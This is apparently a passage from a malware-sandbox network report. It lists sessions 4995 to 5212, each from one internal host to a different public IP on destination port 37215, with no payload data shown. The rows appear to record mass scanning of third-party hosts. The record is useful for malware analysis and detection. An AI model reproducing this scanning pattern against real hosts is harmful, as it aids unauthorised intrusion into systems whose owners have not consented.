                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4995192.168.2.2347722197.23.81.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4996192.168.2.2354198157.136.75.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4997192.168.2.2337216135.168.123.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4998192.168.2.2338592197.56.111.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4999192.168.2.235315678.31.157.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5000192.168.2.2336290157.250.98.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5001192.168.2.2359938157.164.172.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5002192.168.2.2353608157.220.47.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5003192.168.2.234422041.84.196.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5004192.168.2.234779417.56.77.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5005192.168.2.2333528157.89.166.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5006192.168.2.2344478197.178.29.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5007192.168.2.234973041.232.50.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5008192.168.2.2356588197.60.93.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5009192.168.2.2356968197.74.221.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5010192.168.2.2333394157.31.209.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5011192.168.2.2353046157.12.165.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5012192.168.2.2342714190.175.84.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5013192.168.2.235968418.155.193.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5014192.168.2.235004841.113.53.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5015192.168.2.2349630197.53.153.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5016192.168.2.2339140197.5.221.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5017192.168.2.2335394154.220.252.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5018192.168.2.2333556146.48.92.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5019192.168.2.234893469.96.97.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5020192.168.2.235537241.61.0.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5021192.168.2.234923841.114.59.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5022192.168.2.2339984197.178.230.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5023192.168.2.235153041.102.151.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5024192.168.2.234806241.61.2.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5025192.168.2.234810641.1.106.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5026192.168.2.2347820157.187.124.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5027192.168.2.234818641.186.198.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5028192.168.2.235846851.12.64.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5029192.168.2.234430640.147.197.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5030192.168.2.2339218197.65.52.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5031192.168.2.2353750197.211.94.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5032192.168.2.2344636157.189.58.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5033192.168.2.2349294157.94.94.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5034192.168.2.234811841.29.134.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5035192.168.2.2334046157.72.114.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5036192.168.2.2353298197.180.230.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5037192.168.2.2348962197.103.246.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5038192.168.2.235521041.31.129.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5039192.168.2.2334480157.62.27.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5040192.168.2.2358476210.104.112.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5041192.168.2.2352690128.19.208.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5042192.168.2.235466241.175.73.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5043192.168.2.2343390157.80.211.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5044192.168.2.2338976197.234.162.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5045192.168.2.235953812.0.23.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5046192.168.2.2355912157.112.142.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5047192.168.2.233798213.57.67.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5048192.168.2.2333936197.135.69.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5049192.168.2.234402241.80.23.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5050192.168.2.2353280157.245.214.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5051192.168.2.2349100220.155.228.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5052192.168.2.2338868201.217.204.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5053192.168.2.2334376220.32.188.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5054192.168.2.233552441.105.106.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5055192.168.2.2334580157.195.253.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5056192.168.2.2360500168.92.173.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5057192.168.2.2342458197.133.90.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5058192.168.2.2347268197.47.90.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5059192.168.2.235247241.146.35.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5060192.168.2.233936841.234.252.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5061192.168.2.2343326157.48.92.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5062192.168.2.2348700197.254.189.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5063192.168.2.234417241.106.118.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5064192.168.2.2345368197.163.248.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5065192.168.2.2334216157.118.126.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5066192.168.2.235187441.135.153.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5067192.168.2.234415241.145.67.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5068192.168.2.2349122197.3.187.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5069192.168.2.235873041.238.55.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5070192.168.2.234454073.221.11.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5071192.168.2.234361841.142.125.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5072192.168.2.2336024192.40.67.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5073192.168.2.235322041.105.251.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5074192.168.2.233414841.152.88.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5075192.168.2.2338684157.152.221.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5076192.168.2.2338030197.134.199.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5077192.168.2.2360548101.68.217.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5078192.168.2.2347380197.197.251.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5079192.168.2.2359202157.8.120.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5080192.168.2.2345090197.186.8.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5081192.168.2.2346824219.59.21.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5082192.168.2.2342310157.74.249.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5083192.168.2.2343208157.122.179.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5084192.168.2.235174841.79.95.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5085192.168.2.2346482197.245.99.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5086192.168.2.2358370176.199.46.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5087192.168.2.2358882197.94.123.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5088192.168.2.2341188157.34.223.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5089192.168.2.233725237.170.104.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5090192.168.2.2345926197.173.223.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5091192.168.2.2353116197.215.13.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5092192.168.2.2335734157.241.218.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5093192.168.2.2351826197.83.31.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5094192.168.2.2352628197.180.106.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5095192.168.2.2333260157.117.187.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5096192.168.2.2355258197.101.235.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5097192.168.2.2352570157.157.209.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5098192.168.2.2352444197.253.67.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5099192.168.2.233687694.199.62.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5100192.168.2.234307468.203.79.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5101192.168.2.235338841.170.15.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5102192.168.2.233334041.24.254.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5103192.168.2.2355730197.201.167.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5104192.168.2.2346880157.61.142.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5105192.168.2.2336958197.214.251.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5106192.168.2.2340790197.183.43.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5107192.168.2.234539241.59.222.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5108192.168.2.2349942157.91.214.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5109192.168.2.2346360157.92.57.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5110192.168.2.236073641.180.87.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5111192.168.2.235856441.158.172.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5112192.168.2.2334666197.155.132.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5113192.168.2.2350292197.203.86.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5114192.168.2.2341874197.222.123.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5115192.168.2.2349848157.165.103.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5116192.168.2.2347574197.225.70.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5117192.168.2.2356118198.29.160.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5118192.168.2.2358238157.88.56.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5119192.168.2.235056641.221.14.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5120192.168.2.236006441.117.150.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5121192.168.2.2348252218.72.12.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5122192.168.2.2345402157.199.83.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5123192.168.2.2333702157.124.134.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5124192.168.2.2346534197.235.63.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5125192.168.2.235100292.0.144.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5126192.168.2.234220638.190.152.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5127192.168.2.2359812157.129.52.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5128192.168.2.2348624197.250.5.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5129192.168.2.2348980197.140.130.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5130192.168.2.236070241.86.185.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5131192.168.2.233326841.203.188.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5132192.168.2.233802241.209.131.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5133192.168.2.2351148197.212.192.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5134192.168.2.2352382142.59.118.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5135192.168.2.2359816157.226.29.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5136192.168.2.2336044197.179.162.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5137192.168.2.235634041.214.66.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5138192.168.2.2343940157.103.48.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5139192.168.2.2346196197.6.56.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5140192.168.2.234816041.125.247.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5141192.168.2.2347144108.101.118.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5142192.168.2.235027441.202.67.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5143192.168.2.2346272157.12.4.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5144192.168.2.2358500197.15.245.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5145192.168.2.233402641.187.32.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5146192.168.2.234247841.20.95.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5147192.168.2.2340514197.15.66.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5148192.168.2.2355276197.164.149.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5149192.168.2.2335708197.160.192.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5150192.168.2.234599841.77.82.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5151192.168.2.234161041.225.234.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5152192.168.2.2348362157.218.102.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5153192.168.2.2336550157.10.141.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5154192.168.2.234137641.231.103.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5155192.168.2.2352646195.235.183.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5156192.168.2.2341170197.226.32.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5157192.168.2.2360880197.224.254.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5158192.168.2.2354100157.219.193.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5159192.168.2.2359750197.255.186.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5160192.168.2.2349096197.134.189.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5161192.168.2.235922897.77.115.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5162192.168.2.234439641.91.214.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5163192.168.2.2344162157.138.151.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5164192.168.2.235948241.93.203.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5165192.168.2.235026284.17.150.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5166192.168.2.2338374166.145.76.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5167192.168.2.2337050197.181.239.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5168192.168.2.235799241.26.91.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5169192.168.2.2353998103.67.128.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5170192.168.2.2335030199.218.230.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5171192.168.2.233289441.139.241.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5172192.168.2.2341160128.154.99.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5173192.168.2.2339608183.40.98.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5174192.168.2.2343010197.23.40.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5175192.168.2.234457241.109.231.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5176192.168.2.2333226197.117.79.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5177192.168.2.2336628157.209.125.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5178192.168.2.2341424197.39.190.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5179192.168.2.2347328197.204.11.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5180192.168.2.235808841.85.100.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5181192.168.2.235519841.160.127.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5182192.168.2.2355886157.139.224.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5183192.168.2.2359254197.12.14.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5184192.168.2.235590441.147.136.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5185192.168.2.234523666.79.134.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5186192.168.2.2342052197.241.251.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5187192.168.2.2357722157.216.183.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5188192.168.2.233863841.44.198.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5189192.168.2.234999689.21.204.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5190192.168.2.2343736157.66.171.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5191192.168.2.2349320197.215.176.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5192192.168.2.234259041.225.240.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5193192.168.2.234164441.240.69.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5194192.168.2.2334578157.170.62.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5195192.168.2.233806483.90.35.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5196192.168.2.2339724162.46.252.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5197192.168.2.236050864.127.25.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5198192.168.2.2349904157.133.46.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5199192.168.2.233569045.64.229.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5200192.168.2.2352406197.137.68.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5201192.168.2.2356032157.93.241.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5202192.168.2.235103641.213.241.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5203192.168.2.2356144157.187.125.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5204192.168.2.2335306157.196.45.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5205192.168.2.2341052197.254.152.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5206192.168.2.2339880157.191.33.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5207192.168.2.236083441.172.197.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5208192.168.2.2358734201.2.94.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5209192.168.2.2339722197.197.74.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5210192.168.2.235809441.91.180.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5211192.168.2.2342262197.37.120.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5212192.168.2.2346316136.121.130.20937215
                                          TimestampBytes transferredDirectionData


